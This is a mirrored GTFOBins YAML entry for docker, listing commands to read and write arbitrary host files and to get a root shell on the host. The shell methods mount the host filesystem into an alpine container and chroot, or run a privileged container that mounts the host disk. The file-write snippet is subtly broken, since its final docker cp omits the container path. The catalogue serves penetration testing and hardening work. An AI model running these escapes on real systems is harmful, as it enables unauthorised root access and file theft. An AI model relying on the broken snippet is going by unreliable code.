mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
46 lines
1.3 KiB
Plaintext
46 lines
1.3 KiB
Plaintext
---
|
|
comment: |-
|
|
This requires the user to be privileged enough to run `docker`, e.g., being in the `docker` group or being `root`.
|
|
functions:
|
|
file-read:
|
|
- code: |-
|
|
docker cp /path/to/input-file $CONTAINER_ID:input-file
|
|
docker cp $CONTAINER_ID:input-file /path/to/temp-file
|
|
cat /path/to/temp-file
|
|
comment: |-
|
|
Read a file by copying it to a temporary container (`$CONTAINER_ID`) and back to a new location on the host.
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
file-write:
|
|
- code: |-
|
|
echo DATA >/path/to/temp-file
|
|
docker cp /path/to/temp-file $CONTAINER_ID:temp-file
|
|
docker cp $CONTAINER_ID /path/to/output-file
|
|
comment: |-
|
|
Write a file by copying it to a temporary container (`$CONTAINER_ID`) and back to the target destination on the host.
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
shell:
|
|
- code: |-
|
|
docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
- code: |-
|
|
docker run --rm -it --privileged -u root alpine
|
|
mount /dev/sda1 /mnt/
|
|
ls -la /mnt/
|
|
chroot /mnt /bin/bash
|
|
comment: |-
|
|
This exploits the fact that is run with the `--privileged` option to directly mount a host's disk, e.g., `/dev/sda1`.
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
...
|